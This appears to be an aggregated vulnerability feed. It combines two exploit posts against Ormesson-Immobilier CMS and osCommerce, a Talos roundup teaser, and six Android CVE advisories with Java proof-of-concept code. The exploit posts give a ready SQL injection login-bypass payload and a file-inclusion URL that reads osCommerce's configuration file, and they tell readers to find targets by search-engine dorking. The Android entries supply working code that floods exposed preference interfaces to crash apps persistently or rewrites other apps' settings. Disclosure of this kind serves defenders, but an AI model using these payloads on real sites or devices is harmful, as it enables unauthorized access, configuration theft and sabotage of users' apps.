Ormesson-Immobilier CMS version 8 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Ormesson-immobilier cms v8 Auth By Pass Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.easysolutions.lu/                                                                                      |  | # Dork      : powered by Sogis.be ©                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & Pass : 1' or 1=1 -- -[+] http://127.0.0.1/ormesson/MyGestion/#/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Ormesson-Immobilier CMS 8 SQL Injection

osCommerce version 4 suffers from a local file inclusion vulnerability.

    ====================================================================================================================================| # Title     : oscommerce V4 LFI Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.oscommerce.com/                                                                                        |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 62  : https://github.com/osCommerce/osCommerce-V4/blob/main/install/index.php[+] http://locqlhost/install/index.php?rootPath=../../includes/local/configure.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

osCommerce 4 Local File Inclusion

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 2 and June 9. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for June 2 to June 9

An issue found in Yandex Navigator v.6.60 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Denial of Service exists in Yandex Navigator（CVE-2023-29751）**

Vendor: Yandex (https://yandex.com/)

Affected product: Yandex Navigator(ru.yandex.yandexnavi)

Version: 6.60

Download link：https://play.google.com/store/apps/details?id=ru.yandex.yandexnavi&pli=1

Description of the vulnerability for use in the CVE：An issue found in Yandex Navigator v.6.60 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Yandex Navigator application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

while (true) {
    ComponentName componentName = new ComponentName("ru.yandex.yandexnavi", "ru.yandex.common.clid.ClidService");
    Intent intent = new Intent();
    intent.setComponent(componentName);
    intent.putExtra("service\_version", 0);
    intent.setAction("ru.yandex.common.clid.update\_preferences");
    intent.putExtra("preferences", "STORAGE");
    intent.putExtra("application", "ru.yandex.yandexnavi");
    Bundle bundle = new Bundle();
    Bundle bundle2 = new Bundle();
    Bundle bundle3 = new Bundle();
    String randomString = getRandomString(50240);
    bundle2.putString(randomString, randomString);
    bundle3.putLong(randomString, Long.MAX\_VALUE);
    bundle.putBundle("bundle-values", bundle2);
    bundle.putBundle("bundle-time", bundle3);
    intent.putExtra("bundle", bundle);
    ServiceConnection connection = new ServiceConnection() {
        @Override
        public void onServiceConnected(ComponentName name, IBinder service){
        
        }
        @Override
        public void onServiceDisconnected(ComponentName name) {
            
        }
    };
    bindService(intent,connection,BIND\_AUTO\_CREATE);
}

CVE-2023-29751: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Facemoji Emoji Keyboard v.2.9.1.2 for Android allows a local attacker to cause a denial of service via the SharedPreference files.

**Denial of Service exists in Facemoji Emoji Keyboard（CVE-2023-29753）**

Vendor: EKATOX APPS(https://www.facemojikeyboard.com/)

Affected product: Facemoji Emoji Keyboard(com.simejikeyboard)

Version: 2.9.1.2

Download link：https://play.google.com/store/apps/details?id=com.simejikeyboard

Description of the vulnerability for use in the CVE：An issue found in Facemoji Emoji Keyboard v.2.9.1.2 allows a local attacker to cause a denial of service via the SharedPreference files.

Additional information: The Facemoji Emoji Keyboard application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

  public void attack\_keybord(){
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
      //targetSharedPreferencesName: any sharedpreferences's name in the app
        Uri uri = Uri.parse("content://com.simejikeyboard.dprefrenceprovider/string/targetShardPreferencesName/xxx");
        while (true){
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(10240);
            contentValues.put("key",randomString);
            contentValues.put("value",randomString);
            contentResolver.insert(uri,contentValues);
        }
    }

CVE-2023-29753: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Yandex Navigator v.6.60 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

**Escalation of Privileges exists in Yandex Navigator（CVE-2023-29749）**

Vendor: Yandex (https://yandex.com/)

Affected product: Yandex Navigator(ru.yandex.yandexnavi)

Version: 6.60

Download link：https://play.google.com/store/apps/details?id=ru.yandex.yandexnavi&pli=1

Description of the vulnerability for use in the CVE：An issue found in Yandex Navigator v.6.60 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Yandex Navigator application allows unauthorized applications to modify the data in its SharedPreference file, which is loaded into memory for use at application startup, thus affecting the implementation of certain features of the application. For example, an attacker can modify the "notification-enabled" value in the ru.yandex.yandexnavi.preferences.xml file through the interface provided in the exposed components of the Yandex Navigator application. This can turn off the search box in the notification bar of the application, affecting the normal functionality of the application and causing an escalation of privilege attack. In fact, attacker can insert data into any SharedPreferences file whose name start with 'ru.yandex.yandexnavi.', like 'ru.yandex.yandexnavi.ui.PermissionDelegateImpl.PREFERENCES' . In fact, I found that there are many SharedPreferences files like this and they store a lot of important data.

poc：

public void attack\_ru() {
        ComponentName componentName = new ComponentName("ru.yandex.yandexnavi", "ru.yandex.common.clid.ClidService");
        Intent intent = new Intent();
        intent.setComponent(componentName);
        intent.putExtra("service\_version", 0);
        intent.setAction("ru.yandex.common.clid.update\_preferences");
        intent.putExtra("preferences", "ui.PermissionDelegateImpl.PREFERENCES");
        intent.putExtra("application", "ru.yandex.yandexnavi");
        Bundle bundle = new Bundle();
        Bundle bundle2 = new Bundle();
        Bundle bundle3 = new Bundle();
        bundle2.putBoolean("MICROPHONE", false);
        long time = 1657202353619L;
        bundle3.putLong("MICROPHONE", time);
        bundle.putBundle("bundle-values", bundle2);
        bundle.putBundle("bundle-time", bundle3);
        intent.putExtra("bundle", bundle);
        ServiceConnection connection = new ServiceConnection() {
            @Override
            public void onServiceConnected(ComponentName name, IBinder service) {
            }
            @Override
            public void onServiceDisconnected(ComponentName name) {
            }
        };
        bindService(intent, connection, BIND\_AUTO\_CREATE);
    }

CVE-2023-29749: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Facemoji Emoji Keyboard v.2.9.1.2 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.

**Escalation of Privileges exists in Facemoji Emoji Keyboard（CVE-2023-29752）**

Vendor: EKATOX APPS(https://www.facemojikeyboard.com/)

Affected product: Facemoji Emoji Keyboard(com.simejikeyboard)

Version: 2.9.1.2

Download link：https://play.google.com/store/apps/details?id=com.simejikeyboard

Description of the vulnerability for use in the CVE：An issue found in Facemoji Emoji Keyboard v.2.9.1.2 allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.

Additional information: The Facemoji Emoji Keyboard application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application launch and affects critical application functionality. Specifically, an attacker is able to modify the data in the profile\_enable\_subtype.xml file by constructing an intent carrying malicious data. When the key\_enable\_subtype field is modified to an arbitrary string, the virtual keyboard that comes with this application will not be able to output any characters. More seriously, when the key\_enable\_subtype and key\_subtype\_enable\_layout fields are modified to any string at the same time, the virtual keyboard will not pop up when any input box is clicked, and the application will keep reporting errors, leading to escalation of privilege attacks.

poc:

  public void attack\_keybord(){
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.simejikeyboard.dprefrenceprovider/string/profile\_enable\_subtype/xxx");
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(10240);
            contentValues.put("key","key\_enable\_subtype");
            contentValues.put("value",randomString);
            contentResolver.insert(uri,contentValues);
    }

CVE-2023-29752: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Twilight v.13.3 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

**Escalation of Privileges exists in Twilight（CVE-2023-29755）**

Vendor: Twilight(http://twilight.urbandroid.org/)

Affected product: Twilight(com.urbandroid.lux)

Version: 13.3

Download link： https://play.google.com/store/apps/details?id=com.urbandroid.lux

Description of the vulnerability for use in the CVE：An issue found in Twilight v.13.3 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Twilight application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality. Specifically, an attacker is able to change relevant settings in the application by modifying certain key data in the SharedPreference file, such as adjusting the screen brightness, changing the application theme, etc., resulting in an escalation of privilege attack.

poc:

ContentResolver contentResolver = getApplicationContext().getContentResolver();
Uri parse = Uri.parse("content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE\_AUTHORITY/a/a");
    ContentValues contentValues = new ContentValues();
//attacker can update any data in sharedpreferences!
    contentValues.put(targetKey,targetValue);
    contentResolver.insert(parse,contentValues);
    System.out.println("输入数据");

CVE-2023-29755: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Twilight v.13.3 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Denial of Service exists in Twilight（CVE-2023-29756）**

Vendor: Twilight(http://twilight.urbandroid.org/)

Affected product: Twilight(com.urbandroid.lux)

Version: 13.3

Download link： https://play.google.com/store/apps/details?id=com.urbandroid.lux

Description of the vulnerability for use in the CVE：An issue found in Twilight v.13.3 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Twilight application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

ContentResolver contentResolver = getApplicationContext().getContentResolver();
Uri parse = Uri.parse("content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE\_AUTHORITY/a/a");
while(true){
    ContentValues contentValues = new ContentValues();
    String string = getRandomString(10000);
    contentValues.put(string,string);
    contentResolver.insert(parse,contentValues);
}

CVE-2023-29756: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Blue Light Filter v.1.5.5 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

**Escalation of Privileges exists in Blue Light Filter（CVE-2023-29757）**

Vendor: Leap Fitness Group(https://leap.app/)

Affected product: Blue Light Filter(com.eyefilter.nightmode.bluelightfilter)

Version: 1.5.5

Download link： https://play.google.com/store/apps/details?id=com.eyefilter.nightmode.bluelightfilter

Description of the vulnerability for use in the CVE：An issue found in Blue Light Filter v.1.5.5 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Blue Light Filter application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality. Specifically, an attacker is able to change the application's color temperature by modifying the current\_ct field in the SharedPreference file, causing the phone to display abnormally and resulting in an elevation of privilege attack.

poc:

 public void attack\_eye() {
        ContentResolver contentResolver = getContentResolver();
        ContentValues contentValues = new ContentValues();
        Uri uri = Uri.parse("content://com.eyefilter.nightmode.bluelightfilter.PREFFERENCE\_AUTHORITY/a/a");
        contentValues.put("dim", 50);
        contentValues.put("filter\_capacity", 100000);
        contentValues.put("language\_index", -1);//设置语言
        contentValues.put("current\_ct", 600);//设置当前色温
        contentResolver.insert(uri, contentValues);
    }

Tag

#google